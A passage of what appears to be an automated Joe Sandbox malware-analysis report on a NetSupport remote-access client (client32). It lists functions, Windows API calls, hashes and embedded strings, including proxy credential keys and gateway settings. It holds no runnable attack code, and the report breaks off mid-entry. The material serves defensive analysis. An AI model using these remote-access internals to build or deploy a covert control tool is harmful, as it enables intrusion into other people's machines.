                                                                                                                                                                                • Instruction ID: ba9ac0b981c1f0862d5fa69d940274f40709b6541bdede94fe31ed47de48390e
                                                                                                                                                                                • Opcode Fuzzy Hash: d4bf645ef8ffa5ac4e7abba6c901d2d4c850d0c46a7f2be207279af8fb8d708d
                                                                                                                                                                                • Instruction Fuzzy Hash: 64C12B75A1127A9BEB11DBE0CD81FAAF766ABC032DF040438E9159B28CF775E444C791
                                                                                                                                                                                Function 110305F5 Relevance: 31.6, APIs: 5, Strings: 13, Instructions: 149windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wsprintfA.USER32 ref: 11030645
                                                                                                                                                                                • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostwsprintf
                                                                                                                                                                                • String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
                                                                                                                                                                                • API String ID: 875889313-3431570279
                                                                                                                                                                                • Opcode ID: e73fddc59b40390f097d5d34bb571baf7df698aa18e2b409a8fd34a96a81b060
                                                                                                                                                                                • Instruction ID: 917d364d5c6b0b603fb0f9ba81c7ab37e2e4bb2b49ece13a51dcd12a3dfde8f6
                                                                                                                                                                                • Opcode Fuzzy Hash: e73fddc59b40390f097d5d34bb571baf7df698aa18e2b409a8fd34a96a81b060
                                                                                                                                                                                • Instruction Fuzzy Hash: C251FC74F42366AFE712CBE0CC55F69F7957B84B0CF200064E6156B6C9DAB0B540CB95
                                                                                                                                                                                Function 6C6133A0 Relevance: 29.1, APIs: 2, Strings: 17, Instructions: 571COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                                • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247$r<al
                                                                                                                                                                                • API String ID: 2111968516-3707824577
                                                                                                                                                                                • Opcode ID: 263c8349464fadeb5e270a46a3564664ccfdcadcaaba436692a030095f48c44c
                                                                                                                                                                                • Instruction ID: 490aeb7329e546010f9af43ab5532621af88dadba134e241a3bfb0c679f3c03c
                                                                                                                                                                                • Opcode Fuzzy Hash: 263c8349464fadeb5e270a46a3564664ccfdcadcaaba436692a030095f48c44c
                                                                                                                                                                                • Instruction Fuzzy Hash: 1322ABB2A04358AFDB25CF54CC80EEAB3BDAB4A305F04C5D9E54AA7A40D6315F88CF55
                                                                                                                                                                                Function 11060A60 Relevance: 26.6, APIs: 7, Strings: 8, Instructions: 369COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection_free$EnterLeave_memmove
                                                                                                                                                                                • String ID: (NULL)$..\ctl32\Config.cpp$Send EV_CONFIGSET from %s@%d$WARNING: *NOT* Sending EV_CONFIGSET from %s@%d$_tcslen(section) + 1 + _tcslen(key) + 1 <= countof(keybuf)$cfg %x: Set [%s]%s=%s$err == 0$idata->hCurrConfig
                                                                                                                                                                                • API String ID: 771735030-945271576
                                                                                                                                                                                • Opcode ID: 351e9279d979c0f7457591f0f61f3b50903588bbb1ca21464b617b98cfec7b16
                                                                                                                                                                                • Instruction ID: 5f6a64bd8e9a1b8b53731257053372d922084b4c08d6d10ebaf7adba03fe1114
                                                                                                                                                                                • Opcode Fuzzy Hash: 351e9279d979c0f7457591f0f61f3b50903588bbb1ca21464b617b98cfec7b16
                                                                                                                                                                                • Instruction Fuzzy Hash: BDE1C675E4026A9BDB16CF24CC50BEABBFDAF09708F0441D9E849A7245D771AB84CF90
                                                                                                                                                                                Function 110860E0 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(PCIINV.DLL,2520CF5D,02DB7440,02DB7430,?,00000000,1118368C,000000FF,?,11032002,02DB7440,00000000,?,?,?), ref: 11086115
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                  • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,11110F3D,00000000,00000001,?,?,?,000000FF,?,11027947), ref: 1111029E
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 1108613B
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Cancel), ref: 1108614F
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11086163
                                                                                                                                                                                • wsprintfA.USER32 ref: 110861EB
                                                                                                                                                                                • wsprintfA.USER32 ref: 11086202
                                                                                                                                                                                • wsprintfA.USER32 ref: 11086219
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,11085F40,00000001,00000000), ref: 1108636A
                                                                                                                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,74DEF550,?,?,11086390,?,11032002,02DB7440,00000000,?,?,?), ref: 11085D68
                                                                                                                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,74DEF550,?,?,11086390,?,11032002,02DB7440,00000000,?,?,?), ref: 11085D7B
                                                                                                                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,74DEF550,?,?,11086390,?,11032002,02DB7440,00000000,?,?,?), ref: 11085D8E
                                                                                                                                                                                  • Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,11086390,?,11032002,02DB7440,00000000,?,?,?), ref: 11085DA1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad
                                                                                                                                                                                • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                                                                                                • API String ID: 1281665014-2492245516
                                                                                                                                                                                • Opcode ID: 5c6f5f015d4f011bbb0b994541708cedbf37dfa668d58c8cdc1254f37529c73b
                                                                                                                                                                                • Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
                                                                                                                                                                                • Opcode Fuzzy Hash: 5c6f5f015d4f011bbb0b994541708cedbf37dfa668d58c8cdc1254f37529c73b
                                                                                                                                                                                • Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94
                                                                                                                                                                                Function 11030B78 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190synchronizationlibraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 11030CB3
                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11030D82
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                                                                                                • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                                                                                                • API String ID: 2061479752-1320826866
                                                                                                                                                                                • Opcode ID: 8b2f5605d7817431606b678fdb75ce44f6ced4a5dfe324f1dcf8092352c58c67
                                                                                                                                                                                • Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
                                                                                                                                                                                • Opcode Fuzzy Hash: 8b2f5605d7817431606b678fdb75ce44f6ced4a5dfe324f1dcf8092352c58c67
                                                                                                                                                                                • Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51
                                                                                                                                                                                Function 110287A0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 130librarysynchronizationCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000102), ref: 110287F1
                                                                                                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                                                • wsprintfA.USER32 ref: 11028814
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
                                                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
                                                                                                                                                                                • wsprintfA.USER32 ref: 11028891
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 110288A7
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 110288B0
                                                                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 11028911
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 11028925
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                                                                                                                • String ID: "$Locales\%d\$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                                                                                                                • API String ID: 512045693-1744591295
                                                                                                                                                                                • Opcode ID: 4b609b2f65b54af9626e6a28f98aaa318f71e8c4cc59a1b9f4b57722a42d9aba
                                                                                                                                                                                • Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
                                                                                                                                                                                • Opcode Fuzzy Hash: 4b609b2f65b54af9626e6a28f98aaa318f71e8c4cc59a1b9f4b57722a42d9aba
                                                                                                                                                                                • Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0
                                                                                                                                                                                Function 1102D360 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 289servicesleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,?,?,2520CF5D), ref: 1102D594
                                                                                                                                                                                • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
                                                                                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
                                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 1102D5D6
                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 1102D632
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1102D65F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                                                                                                • String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                                                                                                • API String ID: 83693535-1096744297
                                                                                                                                                                                • Opcode ID: 6c9f99d4c070e1c31d426bf077bf9e5c07276eb71935f9a59a980ac90b7da606
                                                                                                                                                                                • Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
                                                                                                                                                                                • Opcode Fuzzy Hash: 6c9f99d4c070e1c31d426bf077bf9e5c07276eb71935f9a59a980ac90b7da606
                                                                                                                                                                                • Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50
                                                                                                                                                                                Function 1102CB60 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1102CBCA
                                                                                                                                                                                  • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1102CCC4
                                                                                                                                                                                  • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                                                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1102CDD8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                                                                                                                • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                                                • API String ID: 596640303-1725438197
                                                                                                                                                                                • Opcode ID: b993271e3a554d29b90d074fb362cc967ca8d5730812d9ad92bbc8c1185534e3
                                                                                                                                                                                • Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
                                                                                                                                                                                • Opcode Fuzzy Hash: b993271e3a554d29b90d074fb362cc967ca8d5730812d9ad92bbc8c1185534e3
                                                                                                                                                                                • Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1
                                                                                                                                                                                Function 11062220 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106227A
                                                                                                                                                                                  • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,00000000,00000000,00020019,?,?), ref: 11061C9C
                                                                                                                                                                                  • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 11061CF4
                                                                                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110622CB
                                                                                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11062385
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 110623A1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
